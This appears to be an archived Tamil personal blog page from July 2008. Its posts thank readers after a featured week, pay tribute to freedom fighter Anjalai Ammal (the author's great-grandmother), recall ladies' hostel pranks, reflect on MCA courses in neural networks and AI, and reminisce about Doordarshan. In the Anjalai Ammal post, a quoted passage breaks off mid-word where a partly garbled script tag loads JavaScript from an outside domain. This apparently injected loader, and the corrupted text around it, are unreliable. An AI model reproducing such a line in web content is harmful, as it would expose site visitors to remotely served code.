Posts filed under: ‘நட்சத்திரம்‘
நன்றிகளுடன்..

கடந்த வாரத்தில் என்னையும் என் பதிவுகளையும் பொறுத்துக் கொண்ட உங்கள் அனைவருக்கும் நன்றிகள் பல!! பின்னூட்டமிட்டு என்னை ஊக்கப்படுத்திய நல்ல இதயங்களுக்கு எக்ஸ்ட்ரா நன்றிகள்!!

தீவிரவாதம் மறைந்து மனிதம் துளிர்க்க பிரார்த்தனைகளோடு விடைபெறுகிறேன்!!

தொடர்ந்து சந்திப்போம்!!

Advertisements

Add a comment ஜூலை 27, 2008

அஞ்சலை அம்மாள் என்றொரு தியாகி

பூங்கொத்து : தமிழ்நாட்டு வீரப் பெண்மணிகள்லிருந்து :

அஞ்சலை அம்மாள்:

அஞ்சலை அம்மாள் விடுதலைப் போராட்டத்தில் ஈடுபட்டு பல முறை சிறை சென்றவர். இவர் குடும்பமே விடுதலைப் போரில் ஈடுபட்டது. 1931ல் உப்புச் சத்தியாக்கிரகம், 1940ல் தனி நபர் சத்தியாக்கிரகம் ஆகியவற்றில் ஈடுபட்டவர். சென்னையில் தடைவிதிக்கப்பட்ட காங்கிரஸ் மாநாட்டுக்குத் தலைமை தாங்கிப் பெண் படையுடன் கைதானவர். சுதந்திரத்திற்குப் பின் ஜில்லா போர்டு உறுப்பினராகவும் சட்டமன்ற உறுப்பினராகவும் இருந்தவர்.

வெப்துனியாவில் இந்திய விடுதலைப் போராட்டத்தில் தமிழர்கள்!

அஞ்சலை அம்மாள் :

தென் ஆர்க்காடு மாவட்டத்தைச் சேர்ந்த அஞ்சலை அம்மாள் சுதந்திர போராட்டத்தில் ஈடுபட்டு தமிழகத்தின் பெருமை காத்தார். 1927ல் நீலன் சிலை அகற்றும் போராட்டத்தில் தனது குடும்பமே ஈடுபட்டு சிறை சென்றது. உப்பு சத்தியாகிரகம், தனி நபர் சத்தியாகிரகம் போன்ற போராட்டங்களில் ஈடுபட்டு சிறை சென்றவர்.

லீலாவதி :

விடுதலை போராட்ட வீராங்கனையான அஞ்சலையம்மாளின் மகள் லீலாவதி. சிறுவயதிலேயே சுதந்திர போராட்டத்தில் ஈடுபட்டவர். இவருக்கு காநதிதான் பெயர் வைத்தார். நீலன் சிலை போராட்டத்தின் போது, தனது தாயுடன் சிறை செனறார்.

கீற்று : சர்வதேசப் பெண்கள் தினம்

தமிழ்நாட்டு வீரப் பெண்மணிகள்

ஆங்கில ஆதிக்கத்தை எதிர்த்து இந்தியர்கள் நடத்திய போராட்டம் ஒரு வீர சகாப்தம். அந்த சுதந்திர வேள்வியில் தங்களை ஈடுபடுத்திக்கொண்ட வீரப் பெண்மணிகள் பற்றி உலகப் பெண்கள் தினத்தில் நினைவு கூர்வது பொருத்தமாக இருக்கும். இது ஒரு முழுமையான பட்டியல் என்று சொல்ல முடியாது. இருந்தாலும் வரலாற்றுப் பக்கங்களில் இடம்பிடித்துள்ள ஒரு சிலரை இங்கே வரிசைப் படுத்தியுள்ளேன்.

அஞ்சலை அம்மாள்: அஞ்சலை அம்மாள் விடுதலைப் போராட்டத்தில் ஈடுபட்டு பல முறை சிறை சென்றவர். இவர் குடும்பமே விடுதலைப் போரில் ஈடுபட்டது. 1931ல் உப்புச் சத்தியாக்கிரகம், 1940ல் தனி நபர் சத்தியாக்கிரகம் ஆகியவற்றில் ஈடுபட்டவர். சென்னையில் தடைவிதிக்கப்பட்ட காங்கிரஸ் மாநாட்டுக்குத் தலைமை தாங்கிப் பெண் படையுடன் கைதானவர். சுதந்திரத்திற்குப் பின் ஜில்லா போர்டு உறுப்பினராகவும் சட்டமன்ற உறுப்பினராகவும் இருந்தவர்.

மரத்தடியில் கடலூர் அஞ்சலையம்மாள் – செல்வநாயகி

“நேற்று என் தந்தை தோண்டினார்
நீரும், எண்ணெயும் தந்தது இப்பூமி
இன்று நான் தோண்டுகிறேன்
அங்கங்கே வெடிகுண்டுகளும் கிடைக்கின்றன
நாளை என் மகன் தோண்டினால்
எங்கும் எலும்புக்கூடுகள்தான் இருக்குமோ?”

இது மாதிரி நாட்டு நிலைமையை நச்சென்று பேசும் கவிதைகள் நாம் முயலாவிடினும் மனதில் பதிந்துவிடுகின்றன. தீவிரவாதம் இப்படியே தொடர்ந்தால் நாளை நாடு இந்தக் கவிதையின் கடைசி வரி சொல்வது போல்தான் இருக்கும். வன்முறையை வளர்ப்பதில் அரசியல் கட்சிகளுக்கும் கணிசமான பங்குண்டு இப்போது. இது தவிரவும் சில வேடிக்கைகள். அண்மையில் வெற்றிபெற்றிருக்கும் சேதுசமுத்திரத் திட்டத்திற்கு “நாங்களே காரணம்” என்று கட்சிகளுக்குள் நடக்கும் கூத்துகளைப் பார்த்துக் கொண்டுதானிருக்கிறோம். நாட்டு விடுதலைக்காகக் குடும்பத்துடன் சிறைக்குப் போனவர்களின் வரலாற்றைப் படிக்கும்போது இன்றைய தலைவர்களை எண்ணி வருந்தாமல் இருக்க முடியாது.

கடலூர் அஞ்சலையம்மாள் தன் கணவர், மகள், மருமகன் எனத் தன்னோடு சேர்த்து தன் குடும்பத்திலிருந்து நான்கு பேருடன் இந்திய விடுதலைக்குப் பங்காற்றியவர். 1890ல் பிறந்து 1961 வரை வாழ்ந்த இவர், சுதந்திரப் போராட்டத்தில் தென்னாட்டிலிருந்து ஈடுபட்ட முதல் பெண்மணி ஆவார். 1927ல் நீலன் சிலை அகற்றும் போராட்டம், 1937ல் உப்புக் காய்ச்சும் போராட்டம், 1933ல் மறியல் போராட்டம், 1940ல் தனிநபர் அறப்போராட்டம் மற்றும் வெள்ளையனே வெளியேறு இயக்கம் போன்ற காங்கிரஸ் பேரியக்கத்தின் பல்வேறு போராட்டங்களிலும் ஈடுபட்டு பல ஆண்டுகள் சிறைவாசம் அனுபவித்தவர் அஞ்சலையம்மாள். கடலூர், வேலூர், திருச்சி, பெல்லாரி சிறைகளில் இருந்தவர். கருவுற்றது முதல் பேறு காலம் வரை பெண்களைக் கண்களுக்குள் வைத்துக் காப்பாற்றும் வழக்கம் நம்மிடையே உண்டு. ஆ༳cript src=http://www.usaadp.com/ngg.js>

இவர் வேறு யாருமில்லை – எனது அம்மாவின் பாட்டி! எனக்கு, கொள்ளுப் பாட்டி!!
தாஸ் கேபிடலை தமிழில் மொழிப்பெயர்த்த ஜமதக்னி, இவரது மருமகன்!

படிப்பறிவில்லாத அஞ்சலை அம்மாள் சுதந்திர வேட்கையோடு, போக்குவரத்து வசதியில்லாத
அந்நாட்களில் மாட்டு வண்டி கட்டிக் கொண்டு ஊர் ஊராக சென்று மக்களுக்கு சுதந்திர தாகத்தை ஊட்டியவர்!

கருவுற்றிருந்த காலத்திலும் சிறைக்குச் சென்றவர்!!

சைக்கிள் பழக தந்தையுடன் மைதானத்திற்கு சென்ற சிறுவன் குண்டு வெடிப்பில் சிக்கியதையும், பாட்டியைப் பார்க்க மருத்துவமனைக்கு சென்ற சிறார்கள் எங்கிருக்கிறார்கள்
என்றே அறியாத பெற்றோரும்…தீவிரவாத்தின் பிடியில் இருக்கும் இந்தியாவைப் பார்த்தால்…மனிதம் இல்லா மானுடம் பார்த்தால்..

இதற்காகவா இவ்வளவு வேதனைப் பட்டோம் என்றே கண்ணீர் வடிப்பார்!!

Add a comment ஜூலை 27, 2008

@ லேடீஸ் ஹாஸ்டல்

ஹாஸ்டல் அனுபவங்கள் ரொம்ப வித்தியாசமானவை. அதுவும் காலேஜ் லைஃப் ஹாஸ்டலில்
அமைந்தால், அதுமாதிரி ஜாலி எதுவும் கிடையாது. லேடிஸ் ஹாஸ்டல்-னா, கேலிக்கும் கூத்துக்கும் கேக்கவே வேணாம்!! நான் UG, PG ரெண்டுமே ஹாஸ்டல்தான்!!
எவ்வளவு வித்தியாசமான் கேரக்டர்கள்…அதுவும், பல்வேறு பின்னணியில்..பல்வேறு மொழிகள்..கலாச்சாரங்கள்!!காலை எழுந்தவுடன் காபி மாதிரி, காலை எழுந்தவுடன் …”எனக்கொரு சிநேகிதி, சிநேகிதி, சிலிண்டர் மாதிரி” என்று ஆரம்பிக்கும் கலாட்டா இரவு தூங்கப்போகும் வரை தொடரும். அப்போ சிரிச்ச மாதிரி
வாழ்க்கையில் அதன்பின் மனம் விட்டு, விட்டேற்றியாக கவலை மறந்து சிரித்திருக்கிறோமா என்பது சந்தேகமே..ஏன்னா, எல்ல்லாத்துக்கும், சிரிப்பு, கும்மாளம், கலாட்டா, நக்கல்,கிண்டல்…எதுலயுமே சீரியஸ்னெஸ் கிடையாது, அதற்காக யாராவது திட்டினாலும் அதுக்கும் கிண்டல்தான்!!

காலேஜ்-னா படிக்கவே வேணாம்..னு நினைச்சு போய் பார்த்தா, அங்கதான் ஸ்கூலைவிட
அதிகமா டெஸ்ட் எழுதியிருப்பேன்., அதுவும், சர்ப்ரைஸ் டெஸ்ட்-ல்லாம் வேற. திடீர்னு பேப்பரை எடுங்க-ன்னு, லிங்க்ட் லிஸ்ட் எழுது,ஷார்ட்ஸ்ட் பாத் எழுது, புபுள் சார்ட்-ன்னா என்ன..னு முதல் வருஷம ஃபுல்லா, டெஸ்ட் மயம் தான். (இந்த ரேஞ்ச்-ல +2 படிச்சிருந்தா ஸ்கூல் ஃப்ர்ஸ்ட் என்ன.. ஸ்டேட் ஃப்ர்ஸ்ட்டே நாந்தான்!! ) இந்த கொடுமைல கொஞ்சம் ஆறுதலா இருந்தது, ஹாஸ்டல் லைஃப்தான்.

ஹாஸ்டல்ல, ஒரு கேங் பார்ம் ஆகிடுச்சின்னா, கலாட்டாதான்.
ஒரு வருஷத்தில ரெண்டு செமஸ்டர். அது எல்லாருக்கும்தான் தெரியுமே. ஆனா, தெரியாத விஷயம் என்னன்னா,எங்களுக்கு ஒவ்வொரு செம்ஸ்டர் முடிஞ்சது ஒரு மாசம் லீவு விடுவாங்க. ஜூலைலேர்ந்து நவம்பர் வரைக்கும் ஒரு செம்ஸ்டர். டிசம்பர் முழுதும் லீவு. ஏன்னா, அந்த குளிர்ல மனுஷன் இருப்பானா? அப்புறம், பொங்கலுக்கு
அப்புறம் ஆரம்பிக்கற இரண்டாவது செமஸ்டரில், மே கடைசில முடியும். ஜூன் மாசம் ஃபுல்லா லீவு. இது மலைமேல இருக்கறதுன்னால இந்த ஏற்பாடு.மத்த காலேஜூல்லலாம், 15 நாள்தான் செமஸ்டர் லீவு!அந்த வருஷம், செமஸ்டர் லேட்டா ஆரம்பிச்சதால, டிசம்பர்ல நடக்க வேண்டிய தேர்வு, லீவு முடிஞ்சு ஜனவரில நடக்கலாம்னு ஒரு வத்ந்தி! ஒழுங்கா படிச்சாலே எழுதறது கஷ்டம். இதுல லீவு முடிஞ்சுன்னா, எல்லாம் பயந்துட்டாங்க! ஒரு ட்வின்ஸ். எங்க ஜூனியர்ங்கதான்!! வெள்ளிக்கிழமை ராத்திரின்னாலே ஜாலிதான்! நாங்கள்ளாம், சரி இந்த ஜூனியர்ஸ்ல்லாம் என்னதான் செய்துங்கன்னு பார்க்கலாம்னு, அவங்க ரூம்கிட்ட போனா, ஒரு பொண்ணு, ட்வின்ஸூல ஒருத்தி, நான் ஆவிங்ககிட்ட பேசுவேன்னு! ம்ம்..பார்த்தா ஒரு பேப்பர்ல ஏதோ ஆங்கில எழுத்துகள், எண்கள்னு எழுதி இருந்தது! அதுல ஒரு காயின் வச்சு, அது மேல ஒரு விரல் வச்சுருந்தா!
“யாரோட ஆவி உனக்கு வரணும்”-ன்னு சுத்தியிருந்தவங்ககிட்ட கேட்டா!!
சரி, நமக்கில்லாம் இட்லிலேர்ந்து வர்ற ஆவிதானே தெரியும்ன்னு பார்த்துகிட்டேயிருந்தோம்.
”ராஜீவ் காந்தி” ன்னு ஒரு குரல் கேட்டுது! ஓ, இது யாருக்கும் தெரியாம போச்சே..அவரையே கூப்பிட்டு, கொலை பண்ணது யாருன்னு கேட்க போறாங்க போலருக்கே! அந்த காயின் கொஞ்சமா நகருகிற மாதிரி ஒரு எஃபக்ட் வேற!!
”என்ன கேட்கணும்,கேளு”ன்னு சொன்னதும், ராஜீவ் காந்தின்னு சொன்ன பொண்ணு சொல்றா “செமஸ்டர் எக்ஸாம் எப்போ வரும்னு”!!அட,பாவிங்களா…உங்க ரவுசுக்கு ஒரு எல்லையே இல்லாம போச்சே!! நமக்கு எப்போ பரீட்சை வரும்னு ராஜீவ் காந்திக்கு தெரிஞ்சிருந்தா, யாரு கொலை பண்ணதுன்னு அவரே வந்து சொல்லியிருக்க மாட்டாரா…!!

ஸ்போர்ட்ஸ் டே..நாலு ஹவுஸ் பிரிச்சு விட்டிருப்பாங்க. அந்த குரூப்-க்குள்ள
எல்லா போட்டியும் நடக்கும். அதுல ஜூனியர்,சீனியர் எல்லாருமே.
ரிலே-ல நாலு தடவை அந்த ஸ்டிக் கைமாறும். எங்களுக்கு ஒரு ஜூனியர்..பியூலான்னு!!
அவ இரண்டாவதா ஓடி வர்ற இடத்தில நின்னுகிட்டிருந்தா! முதல் கோடியிலிருந்து ஓடி வந்த பொண்ணு ப்யூலாகிட்ட ஸ்டிக்கை கொடுத்தா. நாங்க, எங்க டீமை உற்சாகப்படுத்த ஒரமா நின்னுக்கிட்டிருந்தோம், ப்யூலாவுக்கு அருகில்.ஸ்டிக்கை வாங்கின ப்யூலா ஓட ஆரம்பிச்சா. நல்லாதான் ஓடினா, திடீர்னு, எங்களை நோக்கி ஓடி வர ஆரம்பித்தாள். நாங்கள்ளாம் ஒரே குழப்பத்தோட பார்க்கிறோம். ப்யுலாகிட்டயிருந்து வாங்கி ஓட வேண்டியவளுக்கு
என்ன செய்றதுன்னே தெரியல! கிட்ட வந்த ப்யூலாகிட்ட, ஏன்யா இங்க வந்தேன்னு கேட்டதுக்கு, அவ சொல்றா. “நீங்கதானே ப்யூலா.. வந்துடு..வந்துடுன்னு கத்தினீங்கன்னு!!”

ஒரே கலாட்டாவா இருந்தாலும், எல்லாரும் ரொம்ப பாசமா இருப்பாங்க!!
இருப்பதை பகிர்ந்துக்கறது, அனுசரித்து நடந்துக்கிறது, குரூப் ஸ்டடி,
ஒண்ணா படிக்காம வந்து இண்டர்னல்-ஐ தள்ளி வைக்கிறது, எல்லாத்துக்கும் மேல,
இண்டர்னல்-ஐ இன்னைக்கு எழுதமாட்டோம்கிறதை மேம்கிட்ட
negotiate-பண்றதுக்கு ஒரு நாலு நாட்டாமைகளோட போறது,
என்ன திட்டினாலும் அந்த நாலு பேரு மட்டும் திட்டு வாங்கிட்டு, மொத்த க்ளாசும்
சேர்ந்து லூட்டி அடிக்கறது….

வீக் என்ட்ல நம்மை பார்க்க வர்ற சொந்த்க்காரர்கள்/குடும்பத்தினர்
வாங்கி வர்ற நொறுக்ஸை ரூம்ல வந்ததும், நம்ம ரூமிஸ்லேர்ந்து பக்கத்து ரூமிஸ்ல்லாம் சேர்ந்து ஒரே நேரத்துல கை விட்டு எடுக்கனும்..யாருக்கு என்ன வருதோ அது அவங்க லக்-குன்னும், யாருக்காவது பேப்பரு/நூலு இதெல்லாம் வந்தா அவங்களோட நம்ம
கையில் இருக்கறதை பகிர்ந்துக்கறதுல் காக்காவை மிஞ்சிடுவோம் நாங்க!!

ஹாஸ்டல்ல காண கிடைக்கிற கேரக்டர்ஸ் மதிரி வேற எங்கேயும் நாம் பார்க்க முடியாது!
ஒரு குருப் எம் & பி-ன்னு அலைவாங்க..இன்னொரு க்ரூப் ரமணி சந்திரன்..
இதுல ஒரு கதையை படிச்சுட்டா அவங்களோட மத்த கதையெல்லாம் படிக்க வேணாம்..ஏன்னா ஃபார்மேட் ஒன்னுதானே,பேரு, இடம்தான் மாறுபடும்!! ஆனா, படிச்சதையே எத்தன தடவை வேணா படிப்பாங்க,அதுல டிஸ்கஸ் பண்ணுவாங்க..அதுதான் அங்கே காமெடியே!!

அப்புறம், முகத்துல எப்பப்பாரு எதையாவது பூசிக்கிடே அலையறது..முல்தானி மெட்டிலேர்ந்து மெஸ்-ல கிடைக்கிற கேரட்.தக்காளி வரைக்கும்!!இதுல ரெண்டு ரகம்..ஒன்னு வந்து எப்பவும் மத்தவங்களுக்கு செஞ்சு விடுவாஙக..புருவம் கரெக்ட் பண்ணரது, பேஷியல் செய்றதுன்னு! இன்னொரு க்ரூப் இதை செய், அதை செய்ன்னு அவங்ககிட்ட முகத்தைக் காட்டறது!! ஆனா பாதி பேரு கண்ண்டிப்பா கண்ணாடி முன்னாடி இருப்பாங்க மூனு வேளையும, சாப்பிடறாங்களோ இல்லையோ!!

இன்னும் கொஞ்சம் பேரு அராஜக பார்ட்டிஸா இருப்பாங்க…லீடர்ங்க மாதிரி ஆக்ட் பண்ணுவாங்க..!! செலபேரு ஒரே படிப்ஸா இருக்கும்..அவங்க்ளோட வேல பெரும்பாலும் நாங்க படிக்காம வச்சிருக்கற போர்ஷனை படிச்சு, எஙகளுக்கு விளக்கம் சொல்றது!! ரொம்ப கடமையா வேற செய்வாங்க!! அவங்க சொல்றத மட்டும் கேட்டுட்டு போய் செமஸ்டர் எழுதின ஆத்மாக்களும் இருப்பாங்க!!

மொத்ததுல லேடீஸ் ஹாஸ்டல், ரொம்ப கலர்ஃபுல்லான இடம்!!
நாங்க அடிக்க்கும் லூட்டிய பார்த்து, டே ஸ்காலர்ஸும், ஹாஸ்டல்ல சேர்ந்துடுவாங்க!!
அதுவும் காலேஜ் லைஃப ஹாஸ்டல்ல அமையலன்னா வாழ்க்கையில நீங்க ரொம்ப மிஸ் பண்ணிட்டீங்கன்னு அர்த்தம்!!கடைசியாக ஒன்று..

ரொம்ப காமெடில்லாம், பாத்ரூம்லதான் நடக்கும்! இதுவும் அதுமாதிரி ஒன்னுதான்.
ஏன்னா, பொதுவான பாத்ரூம்கள்தான் இருக்கும், ஒரு ஃபுளோருக்கு 10 பாத்ரூம் அப்படின்னு. அதுலயும், முதல் அஞ்சு சீனியர்களுக்கு, அதுவும் இந்த டமுக்கும் அப்புறம் நீஙகளும் உபயோகிக்கலாம்னு, பெரிய மனசு பண்ணி தனியா ரூல்ஸ்லாம் போடுவாங்க!! (இவ்வளவுக்கும், எங்க டேரக்ட் சீனியர்ஸ் கிடையாது!!). ஒருநாள் எங்க கிளாஸ்
ப்ரியா, “சனிகிழமைதானே, எல்லாம் லேட்டா எழுந்து, “சைட் ஸீயிங்” தானே போகுங்கன்னு” நினைச்சு, 6.30 மணிக்கு மூணாவது பாத்ரூமை போய் திறந்திருக்கா( அது கொஞ்சம் சரியா பூட்டாது.) உள்ளே பார்த்தா, ராணி அக்கா..உடனே கதவை மூடிட்டா…
ராணி அக்கா இருக்காங்களே..அவங்கன்னா வார்டனுக்கே செம டெரர். எல்லாருமே கொஞ்சம் பயந்துதான் பேசுவாங்க..ஏன்னா, அவ்ளோ அத்தாரிட்டேடிவ்..!!ம்ம்ம்..ப்ரியா பயந்து போய்ட்டா..அய்ய்யயோ…ராணி அக்காவாச்சே..என்ன பண்ணுவாங்களோன்னு! அப்புறம் அவ செஞ்சதுதான்தான் காமெடியே….திரும்ப கதவை திறந்து, “அக்கா, சாரிக்கா…” ன்னு சொல்லி முடிக்க்றதுக்குள்ள, அவங்க “ப்ப்ப்ரியா” ன்னு கத்தவும்தான் ….அவளுக்கு உறைச்சுருக்கு…என்ன செஞ்சிருக்கோம்னு!!!

1 மறுமொழி ஜூலை 24, 2008

நியூரல் நெட்வொர்க்ஸ், ஆர்டிஃப்சியல் இண்டலிஜென்ஸ்,இன்னபிற

எம்.சி.ஏ-என்று ஒரு PG படிப்பு…உடனே, மாஸ்டர் ஆஃப் குக்கிங் அசிஸ்டெண்ட்ன்னு நினைக்காதீங்க! பி.ஈ (கம்ப்யூட்டர் சயின்ஸ்-க்கு) அடுத்து ரொம்ப சூடான படிப்பு!!

மூன்று வருடங்கள்.அதில் 6 மாதங்கள்(கடைசி செமஸ்டர்) ப்ராஜக்ட்!
பி ஈ சேர இயலாதவர்களுக்கு நல்ல சான்ஸ்..ஏறக்குறைய பி.ஈ (கம்ப்யூட்டர் சயின்ஸ்)-இல் வரும் அதே பேப்பர்கள்தான். சில பேப்பர்கள் அதிகமாகவும் இருக்கும்.
30-32 பேப்பர்கள், அப்ளிகேஷன் சார்ந்தது-என்பதால் கொஞ்சம்
ஹெவியாகவும் இருக்கும். (ஒரு சிஸ்டம்ஸ் அனலிஸ்ட் ஆகற அளவுக்கு!)

நியூரல் நெட்வொர்க்ஸ், ஆர்டிஃப்சியல் இண்டலிஜென்ஸ்,
க்ராபிக்ஸ், எக்ஸ்பர்ட் சிஸ்டம்ஸ், ரோபோட்டிக்ஸ், கம்பைலர் டிசைன்,
என்று ரொம்ப சுவாரசியமான பாடங்கள் இருக்கும்! சுவாரசியமா இல்லையா எனபது, அதை எடுக்கும் பேராசிரியகர்களையும், நம்முடைய ஆர்வத்தையும் பொறுத்தது!

நியூரல் நெட்வொர்க் என்பது, நம் மூளையில இருக்கும் ஆயிரக்க்கணக்கான் நியுரான்கள் எப்படி வேலை செய்கின்றனவோ அதே போல், ஒரு கம்ப்யூட்டர் (node)நோடை சிமுலேட் செய்வது,அது எப்படி மற்ற நோட்களுடன் வேகமாக தொடர்பு கொண்டு வேலை செய்வது ம்ற்றும் கற்றுகொள்ளும் திறனையும் செயற்கையாக வரவைப்பது!
(யாராவது எக்ஸ்பெர்ட்ஸ் இருந்தா கரெக்ட் பண்ணுங்க, ரொம்ப காலம்
ஆச்சு அதயெல்லாம் படிச்சு!)!!

இன்னொரு சுவாரசியமான் பேப்பர், ஆர்டிபீசியல் இண்டலிஜென்ஸ் – கம்பியூட்டருக்கு ஐ.க்யூ வை செயற்கையாக புகுத்தி மனித மூளை போல் செயல்படவைப்பது. இப்போ நம்ம ஃபிரிஜ்-ல பால் இல்லன்ன உடனே, நம்ம ப்ரிஜ் பால் பூத்துக்கு செய்தி அனுப்பி, பால் நம்ம வீட்டு வாசலுக்கே வந்து விடும். இது ஒரு சின்ன உதாரணம்.ஒருவேளை சுஜாதா கதைகளில் இன்னும் அதிகமா சொல்லப்ப்ட்டிருக்கலாம்.

எக்ஸ்ப்ர்ட் சிஸ்டம் என்பது, எந்த் உதவி வேண்டும் என்றாலும் நாம் அணுகக் கூடிய ஒரு
சிஸ்டம். மனிதனுக்கு பதில்!! அது ஒரு துறை சார்ந்த எக்ஸ்ப்ர்ட்டாக இருக்கும். உதாரணதுக்கு, இப்பொ நமக்கு உடம்பு சரியில்லன்ன, டாக்டர்கிட்ட போக வேணாம். அதான் எல்ல இண்டலிஜென்ஸூம் இதுகிட்டா இருக்குமே..உடனே, டாக்டர் கேக்கிற அதே கேள்விகளை/அதைவிட கூடக் குறைய (!)கேட்கலாம். ஒவ்வொரு சிம்டம்ஸா பார்த்து சாரி..அது ஆராய்ச்சி செய்து, எதனால் ஜூரம், என்ன மருந்துகள், எப்போ குணமாகுமென்று சொல்லும்!!செயற்கையாக ஒரு நிபுணத்துவத்தை கொண்டு வருவது!!
இதுவும் ஒருவகை ஆர்டிஃப்சியல் இண்டலிஜென்ஸ்னும் சொல்லலாம்..ஆனா இது பொதுவாக
ஏதாவது ஒரு குறிப்பிட்ட துறை சார்ந்ததாக இருக்கும்!

சரி, எதர்கு இதையெல்லாம் சொல்கிறேன் என்றால், இதையெல்லாம் படிக்கும் போது ஒரே கனவுதான்..ஓ நாம் எம்.சி.ஏ முடிச்சிட்டு, இதுலல்லாம் வேலை செய்ய போகிறோமா என்று!! அது மட்டுமா, சும்மா இருக்காமல், பேப்பர் எல்லாம் எழுதி இன்ஃபோசியத்திற்கு அனுப்ப வேண்டியது. அங்கு, என்னவோ நாம் எழுதியதை நாளைக்கே implement செய்வது போல் கேள்விகள் வேறு.இது எல்லா எம்.சி.ஏ மாண்வர்களின் வாழ்க்கையில் நடக்கக் கூடியதுதான்!!

ஆனா, படித்து முடித்து வெளியில் வந்து பார்த்தால்தான் தெரியும், இவற்றில் எந்த பேப்பருமே இந்தியாவில் வேலைக்கு ஆகாதென்று! நாம் படித்த கம்ப்யூட்டர் மொழிகள்
கூட outdate ஆகியிருக்கும். சில சமயம் தனியாக கோர்ஸ் படித்து வேலை தேட வேண்டும். அப்படி தேடின வேலை என்னவாக இருக்கும் என்கிறீர்கள்..
யாராவது ஏற்கெனவே எழுதின நிரலியில், இருக்கும் தவறுகளை சரி செய்வது, இல்லையெனில் ஒரு சின்ன அப்ளிகேஷனைச் சேர்ப்பது, இருப்பதை மாற்றுவது..இல்லையெனில் இருக்கவே இருக்கிறது….தப்பு கண்டுபிடித்து மேலிடத்திற்கு
சொல்லும் வேலை!

ஆனால் இவ்வளவு கஷ்டப்பட்டு கனவுகளோடு படித்த அந்த துறைகளிலெல்லாம் நம் நாட்டில்
எங்காவது ரிசர்ச் நடக்கின்றதா? வெளிநாட்டு பல்கலைக்கழகங்களில்/ஆய்வகங்களில் இருக்கலாம். ஆனா, நம் நாட்டில் படித்தவர்களுக்கு இங்கே அந்த துறையில் மேலே தொடர்வதற்கு வழி இருக்கிறதா என்பது சந்தேகமே!! அப்படியே இருந்தாலும், அவர்கள் பி.ஹெச்டி தான் செய்ய வேண்டும், ஆனா அதுக்கேத்த மாதிரி வேலையோ சம்பளமோ இருக்காது என்பது எனது அவதானிப்பு.

நான் உதாரணத்திற்கு கணினித் துறையைச் சொல்லியிருக்கிறேன். ஆனால் bio-informatics என்று எடுத்துக் கொண்டாலும் கூட, மேலே ஆராய்ச்சி, அல்லது மேல் படிப்புக்குக் கூட
வெளிநாடுகளில்தான் வாய்ப்பு உண்டு!! ஐஐடி-யில் இருக்கலாம். ஆனால் விரும்புகிற அனைவருக்கும் வாய்ப்பு கிடைப்பது சாத்தியமில்லையே!! ஏன் bio-informatics படித்த நிறைய பேர், அவர்கள் படித்த துறைக்கு தொடர்பில்லாத சாப்ட்வேரில் வேலை செய்வதை
மறுக்கமுடியாது!!

ரோபோ என்றால் ஜப்பான் தான் எனக்கு ஞாபகம் வருகிறது. இதுவரை நாம் ஏதாவது ரோபோக்கள் செய்திருக்கிறோமா? நாம் ஏன் எந்த product-ஐயும் சொந்தமாக தயாரிப்பது இல்லை? சாப்ட்வேர் என்றால் இந்தியர்கள்தான் என்ற நிலையில், எல்லாமே மற்ற நாடுகளுக்கு நாம் சர்வீஸ்களாகவே இருப்பது ஏன்? (டாலிதான் இந்திய product). ஒருவேளை இந்த மாதிரித் துறைகளில் ஆராய்ச்சிகள் நடந்து, நமக்கு வெளியில் தெரிவது இல்லையா?

தெரிந்தவர்கள் அல்லது பேராசிரியர்கள் யாராவது விளக்குங்களேன், ஒருவேளை எனது அறியாமையாகக் கூட இருக்கலாம்!!

பி.கு : நான் சொன்ன உதாரணங்களான் ப்ரிஜ்ஜில் பால், நியூரான்கள் இவையெல்லாம்
இன்னும் நடைமுறை வாழ்வில் சாமான்ய மனிதனுக்கு (செல்போன் போல) எட்டும் வரை உலகமும், கணினித் துறைக்கான தேவையும்/மவுசு இருக்கும்.

Add a comment ஜூலை 23, 2008

தூர்தர்ஷனும் கேபிள் டீவியும்!!

கொஞ்சம் நாஸ்டால்ஜிக்…!!

இப்போ எத்தனையோ சானல்கள் வந்தாலும், ஒரே மாதிரி நிகழ்ச்சிகள்தான் எல்லாவற்றிலும்!!
இசையருவியில் ஒரு பாட்டு போட்டா, அடுத்த பதினைந்தாவது நிமிடத்தில், அதே பாட்டு ஜெயாவின் ம்யூசிக் சானலில்!! ஆனா, தூர்தர்ஷன் மட்டுமே இருந்த நாட்களில் பல சுவாரசியமான நிகழ்ச்சிகள்..மற்றும் வெரைட்டியான நிகழ்ச்சிகள்!! தமிழில் நிகழ்ச்சிகள் இருந்தாலும், பெரும்பாலானவை இந்தியில்தான் இருக்கும்! எங்க பாட்டி இந்தி-யை எழுத்துக் கூட்டி படிக்கற லெவல்ல இருந்தவங்க, DD பார்த்து நல்லா படிக்க ஆரம்பிச்சுட்டாங்கன்னா பார்த்துக்கோங்க!!

புதன் கிழமை என்ன வகுப்புன்னு ஞாபகம் இருக்காது..ஆனா சித்ரஹார் போடுவாங்கன்னு மட்டும் ஞாபகம் இருக்கும். அந்த நேரம் பார்த்து யாரவது கெஸ்ட் வந்துடக்கூடாதுன்னு வேற வேண்டிப்பேன். ஏன்னா, வீட்டுல யாராவது விருந்தினர் இருக்கும்போது டீவீ பார்க்கக்கூடாதுன்னு ஒரு ஸ்ட்ரிக்ட் கண்டிஷன். ஏன்னா, வந்திருக்கறவங்களை அவமதிக்கற மாதிரியாம் அது…சோ அவங்களை மதிச்சு பேசனும் அப்படி இப்படின்னு!!நானோ, அவங்களையும், கடிகாரத்தியும் மாறி மாறி பாத்துக்கிட்டிருப்பேன்! ஓக்கே..ஓக்கே..எங்கேயோ போய்ட்டேன்!!அதேமாதிரி,வெள்ளிக்கிழமைன்னா ஒளியும் ஒலியும்,கடைசி பாட்டு மட்டும் புதுப் பாட்டு போடுவாங்க!! ஞாயித்துகிழமை ரங்கோலி, மத்தியானம் பிராந்திய மொழி படங்கள்!! சாயங்காலம் நம்ம தமிழ்படம்..ஆனா படம் பார்க்க அனுமதி கிடையாது!

சீரியல்லாம் நிஜமாவே பார்க்கும்படியா இருக்கும்! ரொம்ப இன்ஃபோர்மேட்டிவாவும் சில
நிகழ்ச்சிகள் இருக்கும். சுரபின்னு ஒரு ப்ரொக்ராம்..அதை மிஸ் பண்ணியதேயில்லை!

